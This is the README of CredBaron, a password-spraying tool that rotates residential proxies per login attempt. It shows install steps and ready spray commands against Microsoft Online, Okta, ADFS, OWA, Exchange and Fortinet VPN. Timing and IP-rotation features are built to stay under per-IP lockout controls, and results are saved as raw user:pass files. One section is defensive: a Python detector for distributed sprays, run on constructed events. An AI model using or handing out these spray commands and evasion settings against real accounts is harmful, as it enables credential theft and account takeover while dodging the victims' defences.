CredBaron is a Go port of CredMaster that uses residential proxy rotation instead of AWS API Gateway / FireProx. Every auth attempt can ride a different source IP, either from a proxy list or from a single rotating-endpoint URL.
```bash
# prebuilt release: https://github.com/dejisec/credbaron/releases
# or install
go install github.com/dejisec/credbaron/cmd/credbaron@latest
# or build from source
git clone https://github.com/dejisec/credbaron
cd credbaron && make build
./credbaron plugins list
```

Docker:

```bash
docker build -t credbaron .
docker run --rm -v "$PWD:/work" -w /work credbaron spray --config config.json
```

You hand CredBaron a plugin name, a user list, a password list, and a proxy source. It spins up a worker pool (default 10) where each worker picks a fresh proxy URL from your source for every request. Each attempt retries up to 3 times with 2s backoff on transport errors, and the plugin classifies the response as success, failure, or potential. Before the pool spawns, CredBaron fires one pre-flight request through the proxy to confirm the target is reachable, so a dead proxy source surfaces immediately.
Successes, valid usernames, and the full console transcript all land in timestamped files under --output-dir. If you pass --resume <state.jsonl>, already-classified (user, password) pairs are skipped on the next run.
Confirm that your proxy is working:

```bash
./credbaron proxy check \
  --proxy-endpoint 'http://user:pass@gate.provider.com:7777'
# or
./credbaron proxy check --proxy-file proxies.txt --count 5
```

Spray Microsoft Online (msol plugin):

```bash
./credbaron spray \
  --plugin msol \
  -u users.txt -p passwords.txt \
  --proxy-endpoint 'https://user:pass@gate.provider.com:7777' \
  --threads 20 \
  --jitter 10 --jitter-min 3 \
  --passwords-per-delay 1 --delay 180 \
  --color
```

With a proxy list file instead:

```bash
./credbaron spray \
  --plugin msol \
  -u users.txt -p passwords.txt \
  --proxy-file proxies.txt \
  --proxy-strategy random
```

14 plugins ship with the binary. Run credbaron plugins list to view the current set.
- Microsoft / Azure AD: msol, msgraph, azvault, azuresso, o365enum
- Federated / SSO: adfs, okta, pingfed
- Exchange: owa, ews
- VPN: fortinetvpn
- Enumeration: gmailenum
- Generic: httpbrute, httppost

Two mutually-exclusive modes: --proxy-file <path> for a newline-separated list, or --proxy-endpoint <url> + optional --proxy-session-var <token> for a single gateway that rotates IPs per session. NTLM and PingFed plugins pin one proxy per credential attempt because those handshakes can't rotate mid-flight. --insecure-tls skips cert verification end-to-end (for self-signed OWA/EWS). See docs/proxies.md.
Four independent timing knobs, all optional, all compose:
- Jitter: random sleep before each attempt
- Batch: sleep every N attempts per worker
- Inter-password delay: sleep between password cycles
- Weekday warrior: only spray during business hours Mon–Fri
See docs/config.md for the full flag reference, --randomize, --stop-on-success, timeouts, UA rotation, and custom headers.
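
Seen from the defending side, per-request proxy rotation combined with the timing knobs above leaves per-source-IP failure counters with roughly one failure per address. The following is an added example, not part of CredBaron or its docs: it flags time windows in which many distinct accounts each fail only once or twice from mostly unique IPs. The event schema, thresholds and function names are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sample_events():
    """Constructed sign-in events: (timestamp, user, source_ip, result)."""
    t0 = datetime(2024, 5, 6, 9, 0, 0)
    events = []
    # Spray-shaped traffic: 12 accounts, one failure each, a new IP per attempt.
    for i in range(12):
        events.append((t0 + timedelta(seconds=7 * i), f"user{i:02d}@example.com",
                       f"203.0.113.{10 + i}", "failure"))
    # Benign noise: one user mistyping a password three times from one IP.
    for i in range(3):
        events.append((t0 + timedelta(minutes=30, seconds=20 * i),
                       "alice@example.com", "198.51.100.7", "failure"))
    return events

def per_ip_threshold_hits(events, threshold=5):
    """The control that IP rotation sidesteps: failures counted per source IP."""
    counts = defaultdict(int)
    for _, _, ip, result in events:
        if result == "failure":
            counts[ip] += 1
    return [ip for ip, n in counts.items() if n >= threshold]

def detect_distributed_spray(events, window=timedelta(minutes=10),
                             min_users=10, max_fail_per_user=2, min_ip_ratio=0.8):
    """Flag windows where many accounts fail a few times each, IP-agnostic."""
    buckets = defaultdict(list)
    for ts, user, ip, result in events:
        if result == "failure":
            # Tumbling windows keyed by window start.
            start = datetime.min + ((ts - datetime.min) // window) * window
            buckets[start].append((user, ip))
    alerts = []
    for start, rows in sorted(buckets.items()):
        per_user = defaultdict(int)
        for user, _ in rows:
            per_user[user] += 1
        few_failures = [u for u, n in per_user.items() if n <= max_fail_per_user]
        distinct_ips = {ip for _, ip in rows}
        # Rotation shows up as nearly one distinct IP per attempt.
        if (len(few_failures) >= min_users
                and len(distinct_ips) / len(rows) >= min_ip_ratio):
            alerts.append({"window_start": start, "users": len(few_failures),
                           "attempts": len(rows), "distinct_ips": len(distinct_ips)})
    return alerts

if __name__ == "__main__":
    print("per-IP threshold hits:", per_ip_threshold_hits(sample_events()))
    print("spray alerts:", detect_distributed_spray(sample_events()))
```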
Every run writes timestamped files under --output-dir DIR (default .): a -success.txt of raw user:pass, a -validusers.txt of confirmed usernames, a .log transcript, and an optional .jsonl event stream with --json-output. See docs/config.md for filenames and event kinds.
--resume <path> writes every classified attempt to a JSONL checkpoint. On re-run with the same path, already-tested pairs are skipped. See docs/resume.md.
Seven webhook backends, fire-and-forget with a 5-second timeout. See docs/notifications.md.
Everything on the CLI is also settable via JSON. CLI flags override config values. See docs/config.md for the full reference and configs/config.example.json for the complete shape.

```bash
./credbaron spray --config config.json
```

- credbaron spray: the main event. All flags: credbaron spray --help.
- credbaron plugins list: view registered plugin names.
- credbaron proxy check: fire N test requests through the configured proxy source and print the egress IP each returned. --count N (default 3), --target URL (default https://ipinfo.io/json).

- docs/plugins.md: plugin reference, classification model, AADSTS codes, NTLM caveats
- docs/proxies.md: proxy configuration and stateful-auth stickiness
- docs/config.md: CLI flags, config file, timing, output, JSON events
- docs/notifications.md: notifier backends, pairing rules, Teams/Ntfy/Pushover details
- docs/resume.md: checkpoint / resume semantics